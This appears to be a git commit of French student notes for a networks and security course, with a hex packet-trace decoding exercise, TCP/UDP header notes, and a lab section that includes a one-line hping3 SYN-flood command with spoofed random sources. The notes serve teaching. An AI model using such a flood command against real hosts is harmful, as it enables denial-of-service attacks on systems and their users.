initial commit
This commit is contained in:
Binary file not shown.
Binary file not shown.
@@ -0,0 +1,55 @@
|
||||
# SUJET UTC505 : Réseaux et Sécurité
|
||||
|
||||
>Partie Réseaux (19 points noté sur 14)
|
||||
|
||||
## Exercice 1 :
|
||||
|
||||
### Question 1 :
|
||||
|
||||
Délimiter dans le trace hexadécimale l'entête de la trame Ethernet.
|
||||
|
||||
00 20 af 1b 07 fa 00 e0 29 68 8b fb 08 00
|
||||
|
||||
Délimiter dans le trace hexadécimale l'entête du datagramme IP.
|
||||
|
||||
45 00
|
||||
00 77 c1 e6 40 00 40 06 f7 46 c0 a8 00 01 c0 a8
|
||||
00 02
|
||||
|
||||
Délimiter dans le trace hexadécimale l'entête du segment.
|
||||
|
||||
5 -> pas d'option donc 20 octed TCP
|
||||
|
||||
0b fc 1f 40 ea 46 fc 03 08 c4 ec 75 50 18
|
||||
44 70 71 79 00 00
|
||||
|
||||
Délimiter dans le trace hexadécimale la partie HTTP
|
||||
|
||||
### Question 2 :
|
||||
|
||||
1 : 00 20 af 1b 07 fa
|
||||
2 : Une adresse destiné à une autre adresse présise
|
||||
3 : 00 e0 29 68 8b fb
|
||||
4 : 08 00 -> suivis du 4 -> ipv4 oui coérant
|
||||
5: 4 car ipv4
|
||||
6: c0 a8 00 01 192.168.0.1
|
||||
7: c0 a8 00 02 192.168.0.2
|
||||
8:
|
||||
9:
|
||||
10: 0b fc
|
||||
11: 1f 40
|
||||
12: 5 * 4 = 20, pas d'option
|
||||
13: ea 46 fc 03
|
||||
14: 18
|
||||
15: 08
|
||||
16:
|
||||
|
||||
|
||||
# Question 3
|
||||
|
||||
4 - 3 - 1 - 2 - 5
|
||||
|
||||
|
||||
1 - G - B - 4 - D - C - E - H - F - A
|
||||
|
||||
1 - G - B - 4 - E - D - F - C - H - A
|
||||
@@ -0,0 +1,9 @@
|
||||
00 20 af 1b 07 fa 00 e0 29 68 8b fb 08 00 45 00
|
||||
00 77 c1 e6 40 00 40 06 f7 46 c0 a8 00 01 c0 a8
|
||||
00 02 0b fc 1f 40 ea 46 fc 03 08 c4 ec 75 50 18
|
||||
44 70 71 79 00 00 47 45 54 20 2f 20 48 54 54 50
|
||||
2f 31 2e 30 0d 0a 55 73 65 72 2d 41 67 65 6e 74
|
||||
3a 20 57 67 65 74 2f 31 2e 35 2e 33 0d 0a 48 6f
|
||||
73 74 3a 20 31 39 32 2e 31 36 38 2e 30 2e 32 3a
|
||||
38 30 30 30 0d 0a 41 63 63 65 70 74 3a 20 2a 2f
|
||||
2a 0d 0a 0d 0a
|
||||
@@ -0,0 +1,37 @@
|
||||
# UTC505 25/11/24
|
||||
|
||||
Diamètre de connexion avec TCP en lien avec MSS. (Maximum Segment ...)
|
||||
|
||||
Le MSS c'est le diamètre de ségement qui va être envoyé.
|
||||
|
||||
## Entête d'un segment Segment TCP
|
||||
|
||||
TCP header format :
|
||||
|
||||

|
||||
|
||||
UDP header format :
|
||||
|
||||

|
||||
|
||||
TCP (Transport Control Protocol) assure un service de transmission de données fiable avec une détection et une correction d'erreurs de bout en bout. UDP (User Datagram Protocol) offre un service de transmission de datagrammes sans connection.
|
||||
|
||||

|
||||
|
||||
Automate protocolaire TCP :
|
||||
|
||||
Ouverture connexion tcp :
|
||||
|
||||

|
||||
|
||||
|
||||
## TP, TCP sys flooding attack
|
||||
|
||||
pour faire une attaque DDos :
|
||||
|
||||
```
|
||||
hping3 --syn --flood --rand-source -p 80 192.168.1.2
|
||||
```
|
||||
|
||||
Le moyen ce se defendre sur windows c'est Windows Defender. Il est paramétrable pour dire que si on reçois un nombre de segment sans possibilité de réponsee trop souvent, il stop la reception de ce segment.
|
||||
|
||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
|
After Width: | Height: | Size: 14 KiB |
Binary file not shown.
|
After Width: | Height: | Size: 112 KiB |
Binary file not shown.
|
After Width: | Height: | Size: 4.2 KiB |
Binary file not shown.
|
After Width: | Height: | Size: 17 KiB |
Binary file not shown.
|
After Width: | Height: | Size: 5.2 KiB |
Reference in New Issue
Block a user